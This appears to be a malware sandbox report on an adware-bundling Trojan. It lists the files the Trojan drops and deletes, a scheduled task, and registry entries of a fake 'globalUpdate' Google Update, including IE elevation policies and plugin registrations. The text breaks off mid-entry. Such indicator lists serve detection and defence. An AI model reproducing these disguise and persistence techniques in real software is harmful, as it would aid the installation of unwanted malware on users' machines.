The Trojan creates and/or writes to the following file(s):

%Program Files%\Common Files\Goobzo\GBUpdate\un_smw.exe (5617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsC.tmp (6 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smw.sys (962 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smoi32.dll (9345 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smu.exe (38576 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smi32.exe (3472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\AccDownload.dll (12028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsExec.dll (6 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\SBIEBrowserHelperObject.dll (20 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\sma.exe (2495 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\System.dll (11 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smci32.dll (25002 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smfi32.dll (15177 bytes)
%Program Files%\Common Files\Goobzo\GBUpdate\smei32.dll (19492 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\AccDownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nswA.tmp\System.dll (0 bytes)

The process ShopperPro.exe:2564 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\ShopperPro.job (2150 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\config.json (473 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.json (6 bytes)
%Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3073 bytes)
%Program Files%\ShopperPro\config.json (473 bytes)

The process iwebar-bg.exe:296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\0[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\483925[1].txt (50457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\483924[1].txt (43505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\646958[1].txt (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\376579[1].txt (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\196378[1].txt (37009 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\rules[1].json (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\534129[1].txt (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\353989[1].txt (44065 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\183015[1].txt (31745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA3I8N3P.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\353990[1].txt (45857 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\353991[1].txt (457 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[2] (0 bytes)

The process iwebar.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Qcdxs.tmp (186350 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Ixesxgrajdtli.exe (733418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss16.tmp (197150 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\WrapperUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Qcdxs.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx17.tmp\Ixesxgrajdtli.exe (0 bytes)

The process %original file name%.exe:220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (34057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\DcryptDll.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup1.exe (32128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup.exe (346568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\NK.lky (16 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup1.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\DcryptDll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp\NK.lky (0 bytes)

The process lspinst.exe:2404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YouTube Accelerator\instlsp.log (253 bytes)

The process lspinst.exe:2656 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\YouTube Accelerator\instlsp.log (627 bytes)

The process dwwin.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\4CC07.dmp (306250 bytes)

The process sense-bg.exe:1088 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\rules[1].json (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\0[1].htm (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA14G7PL.gif (35 bytes)

The process cr.exe:2984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Ecixv.exe (727822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk10.tmp (198024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Bmpdzenp.tmp (185551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\WrapperUtils.dll (2392 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Ecixv.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\Bmpdzenp.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk11.tmp\WrapperUtils.dll (0 bytes)

The process Object Browser-codedownloader.exe:2148 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\app_code[1].js (457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\dealply_m[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bpo_intext_m[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\monetizationLoader[1].js (72929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\superfish_no_coupons_m[1].js (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\setup[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\similar_products_m[1].js (48329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\plugins[1].json (4585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\adextent_m[1].js (431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ie[1].js (491 bytes)

Registry activity

The process GoogleUpdate.exe:3772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "55 0F FC 61 07 F0 2C 2F 98 0E BC A2 3D E8 65 90"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1401908123"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 9F C8 77 D2 C6 8E A2 37 42 46 4F 03 C9 F4 BA"

[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"

[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

The process GoogleUpdate.exe:2432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D CD 06 B9 26 3F 74 6C 9C 29 68 73 E4 B9 80 3A"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:2980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 32 B3 66 61 91 24 EB 41 11 FC 1E 8E 5A 81 2C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{DD1B4183-F36A-4489-9A68-4205A6801149}]
"pv" = "1.3.25.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"

The process GoogleUpdate.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
